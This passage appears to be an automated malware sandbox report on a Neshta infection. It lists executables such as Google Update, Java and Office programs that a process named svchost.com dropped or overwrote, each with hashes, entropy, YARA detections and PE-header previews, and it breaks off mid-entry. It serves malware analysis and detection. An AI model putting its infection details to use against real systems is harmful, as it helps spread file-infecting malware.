                                                                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571346004771877
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5964179831347325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.330325009255707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.346606571165856
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                                                                                        MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                                                                                        SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                                                                                        SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                                                                                        SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.107296013528715
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                                                                                        MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                                                                                        SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                                                                                        SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                                                                                        SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.242980084696127
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                                                                                        MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                                                                                        SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                                                                                        SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                                                                                        SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.2705620011183765
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                                                                                        MD5:F56F560D473A7660D3AD44E731930A06
                                                                                                                        SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                                                                                        SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                                                                                        SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.110851138659397
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                                                                                        MD5:4DA76295D7246E94AC917F192A2ACE84
                                                                                                                        SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                                                                                        SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                                                                                        SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46960810763993
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                                                                                        MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                                                                                        SHA1:96384CCD613D795E953BFD876250C86007EF74D6
                                                                                                                        SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                                                                                        SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.448388258977007
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                                                                                        MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                                                                                        SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                                                                                        SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                                                                                        SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.285196024262785
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                                                                                        MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                                                                                        SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                                                                                        SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                                                                                        SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.72011826313205
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                                                                                        MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                                                                                        SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                                                                                        SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                                                                                        SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.169493808225336
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                                                                                        MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                                                                                        SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                                                                                        SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                                                                                        SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3186383734960625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                                                                                        MD5:B4F5C898517A6B40402611BF65397423
                                                                                                                        SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                                                                                        SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                                                                                        SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.392056642854633
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                                                                                        MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                                                                                        SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                                                                                        SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                                                                                        SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.496755886640026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                                                                                        MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                                                                                        SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
